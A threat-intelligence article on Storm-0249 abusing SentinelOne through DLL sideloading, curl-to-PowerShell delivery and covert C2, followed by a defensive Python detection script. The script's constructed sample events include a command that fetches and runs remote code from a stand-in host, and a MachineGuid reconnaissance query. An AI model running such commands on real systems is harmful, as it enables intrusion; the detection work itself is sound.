Invisible Ransomware: Storm-0249 Weaponizes SentinelOne EDR in Stealth Attacks
The financially motivated group Storm-0249, long known as a broker of initial access for ransomware operators, has markedly refined its tradecraft, triggering a new wave of alarm among cybersecurity professionals. Analysts at ReliaQuest have observed the group shifting away from broad phishing campaigns toward highly targeted intrusions that exploit trusted components of EDR platforms — most notably SentinelOne. This strategy enables attackers to disguise malicious activity as ordinary defensive operations and maintain persistence within victim environments for weeks as they prepare the ground for future ransomware deployments.
Where Storm-0249 once relied on mass phishing and simple loaders, its attack chains now feature spoofed Microsoft domains, fileless PowerShell execution, delivery of malicious code via curl.exe, and — above all — DLL sideloading adjacent to signed SentinelOne binaries. In one incident, the attackers deployed a fraudulent MSI package executed under SYSTEM privileges, which planted a tampered DLL beside the legitimate SentinelAgentWorker.exe. The EDR process then dutifully loaded the malicious library, under whose cover reconnaissance was conducted, telemetry was exfiltrated to attacker-controlled domains, and communication with command-and-control infrastructure was established.
Especially troubling is Storm-0249’s newfound ability to use EDR agents themselves as transport layers for covert command-and-control channels. Microsoft Defender recorded instances in which the signed SentinelAgentWorker.exe contacted domains registered by the attackers mere weeks before the intrusion. Yet processes bearing trusted digital signatures rarely prompt scrutiny. Combined with TLS encryption, these channels become virtually invisible to conventional traffic-analysis systems.
The group also makes extensive use of legitimate Windows utilities such as reg.exe and findstr.exe to conduct reconnaissance, including the retrieval of MachineGuid — a parameter many ransomware families use to bind encryption keys to specific devices. By executing such commands under the guise of a signed EDR process, Storm-0249 disappears completely into the “noise” of normal system activity.
Researchers warn that the abuse of trusted processes raises the threat landscape to an entirely new tier. Standard remediation measures — reinstalling agents, updating endpoints — no longer suffice. MSI packages running with system-level privileges provide a durable foothold that survives most basic cleanup procedures. Furthermore, the techniques employed by the group can be easily adapted to other EDR solutions, making the issue systemic rather than product-specific.
ReliaQuest stresses that defeating Storm-0249 requires behavioral analytics, automated response capabilities, and deep monitoring of trusted processes. Their updated GreyMatter detection rules aim to surface atypical behavior: loading unsigned DLLs into AppData, PowerShell execution piped from curl.exe, connections to recently registered domains, suspicious registry operations, and persistence attempts. Automated playbooks for host isolation, domain blocking, and malicious hash suppression can reduce response time from hours to minutes and prevent ransomware deployment.
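As an added example (not code from ReliaQuest, SentinelOne or the article), the following Python pass applies the behaviors described above, DLL sideloading beside SentinelAgentWorker.exe, MachineGuid lookups via reg.exe, curl.exe piped into PowerShell, and EDR traffic to newly registered domains, to constructed Sysmon-style events. The event field names, file paths, domains and registration dates are assumptions, not a real product schema.

```python
import re
from datetime import date

# Constructed sample telemetry (field names, paths, domains and dates are assumptions).
EVENTS = [
    {"type": "image_load", "signed": False,
     "process": r"C:\Program Files\EDR\SentinelAgentWorker.exe",
     "image": r"C:\Users\bob\AppData\Roaming\mso\wintrust.dll"},
    {"type": "image_load", "signed": True,
     "process": r"C:\Program Files\EDR\SentinelAgentWorker.exe",
     "image": r"C:\Windows\System32\kernel32.dll"},
    {"type": "process_create",
     "parent": r"C:\Program Files\EDR\SentinelAgentWorker.exe",
     "cmdline": r"reg.exe query HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid"},
    {"type": "process_create", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "curl.exe -s https://update.example/stage | powershell.exe -nop -"},
    {"type": "network_connect",
     "process": r"C:\Program Files\EDR\SentinelAgentWorker.exe",
     "domain": "update.example", "registered": date(2025, 3, 1)},  # WHOIS enrichment, constructed
]
NOW = date(2025, 3, 20)
EDR_BINARIES = {"sentinelagentworker.exe"}  # trusted EDR images to watch

def is_edr(path):
    # True if the image file name is one of the watched EDR binaries
    return path.rsplit("\\", 1)[-1].lower() in EDR_BINARIES

def detect(events, now=NOW, young_days=30):
    """Return (rule, detail) tuples for events matching the Storm-0249 behaviours."""
    alerts = []
    for e in events:
        if e["type"] == "image_load":
            # Unsigned DLL under AppData loaded by a signed EDR process (sideloading)
            if is_edr(e["process"]) and not e["signed"] and "\\appdata\\" in e["image"].lower():
                alerts.append(("unsigned_dll_in_appdata", e["image"]))
        elif e["type"] == "process_create":
            cmd = e["cmdline"].lower()
            # MachineGuid reconnaissance via reg.exe spawned from the EDR process
            if "reg.exe" in cmd and "machineguid" in cmd and is_edr(e.get("parent", "")):
                alerts.append(("machineguid_query_from_edr", e["cmdline"]))
            # Fileless delivery: curl.exe output piped straight into PowerShell
            if re.search(r"curl(\.exe)?\b.*\|\s*powershell", cmd):
                alerts.append(("curl_piped_to_powershell", e["cmdline"]))
        elif e["type"] == "network_connect":
            # EDR agent talking to a domain registered only days before
            if is_edr(e["process"]) and (now - e["registered"]).days < young_days:
                alerts.append(("edr_to_young_domain", e["domain"]))
    return alerts

if __name__ == "__main__":
    for rule, detail in detect(EVENTS): print(rule, detail)
```

In production the `registered` date would come from a WHOIS/RDAP enrichment step and the events from the EDR or Sysmon pipeline; the thresholds here are illustrative.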
Experts broadly agree that Storm-0249’s tactics will become a catalyst for other groups in the IAB and RaaS ecosystems. The fusion of targeted intrusions, abuse of trusted processes, and durable persistence significantly accelerates the ransomware kill chain and narrows defenders’ window to detect and disrupt an attack. Organizations must therefore strengthen controls around PowerShell and curl.exe, enhance DNS-traffic monitoring, track anomalies in EDR-agent behavior, and respond immediately to any unusual network activity originating from trusted processes. Such measures become critically important when adversaries have learned to weaponize defensive systems as instruments of their own stealth.